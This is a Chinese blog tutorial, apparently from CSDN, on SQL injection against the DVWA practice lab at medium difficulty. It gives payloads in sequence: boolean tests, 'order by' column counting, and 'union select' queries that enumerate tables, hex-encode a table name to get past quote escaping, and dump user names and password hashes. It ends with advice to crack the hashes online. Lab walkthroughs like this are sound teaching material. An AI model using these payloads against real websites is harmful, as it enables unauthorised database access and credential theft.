注入id列表_SQL注入--dvwa靶场--medium注入详解

medium等级提供了下拉列表选择user ID

57ff2e53a9a9dff0049b412d838d0416.png

这个时候是没有输入框的,那么想要注入就抓包试试(burpsuit)

1d76aed164fe929e968f094598327327.png

获得数据包以后我们发现里面的ID选项是可以修改的,那么我们进行注入类型的判断

1 and 1=1成功执行

940ef501a5cb793a34eac9491ec530f6.png

31a209b3e497b8aca4f46fe6bfcb6f20.png

1 and 1=2,逻辑为假,不执行

f215fd48de8b2b615ab0decd1a34b541.png

1',报错。综上可以判断存在数字型注入。并且我们可以发现'被转义为'

8ea4a25298bb670018afed78d47e9114.png

=1 order by 1#猜解字段数

783156d80c69c28d683fc70eb46f6b60.png

=1 order by 2#

afba0eef1f6000fb056b249ad55fa5a2.png

=1 order by 3#报错,说明字段数为2

0672d308a16275bbcc9cf954080f0db0.png

1 union select 1,2#确定出回显位置有两个

bf4296564622915ab88562527c44ffef.png

1 union select 1,database()#得到数据库名称

ea047781248a3eaad4af8aa3bd5593bd.png

id=1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

b840836fdc65c6b0b37e566df2a57d2b.png

得到dvwa中两张表名guestbook和users

考虑到单引号被转义,可以利用 16 进制进行绕过

union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 #

70dc48d46863ac0c8744365537073441.png

=1 union select user,password from users#获取字段内容

698dcda663b8aa68ec2d8306fc9304d9.png

最后得到的密码是经过MD5加密的,我们可以使用MD5在线解密工具对其进行解密后得到明文密码。

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值